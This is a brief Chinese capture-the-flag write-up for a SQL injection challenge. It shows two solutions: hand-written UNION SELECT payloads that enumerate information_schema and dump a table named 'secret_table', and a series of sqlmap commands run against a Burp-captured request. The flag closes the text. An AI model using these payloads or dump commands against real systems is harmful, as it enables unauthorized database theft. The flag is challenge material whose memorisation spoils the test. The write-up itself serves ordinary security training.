两个方法,嘿嘿嘿
手工注
首先用
' and 0 union select 1,2,3#
来初步判断该sql查询返回三列数据
然后就可以找表
' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS#
然后看到了一个非常显眼的表,爆他
' and 0 union select 1,column_name,3 from information_schema.columns where table_name='secret_table'#
啥也别说了,直接整
' and 0 union select 1,id,fl4g from secret_table#
sqlmap一把梭
用bp抓包,随便输入个数
将抓包后的数据存储在1.txt文件上(文件放在sqlmap的目录下),用sqlmap爆库,
python sqlmap.py -r 1.txt --dbs
接着爆表
python sqlmap.py -r 1.txt -D news --tables
爆字段
python sqlmap.py -r 1.txt -D news -T secret_table --columns
整就完了
python sqlmap.py -r 1.txt -D news -T secret_table -C "fl4g,id" --dump
QCTF{sq1_inJec7ion_ezzz}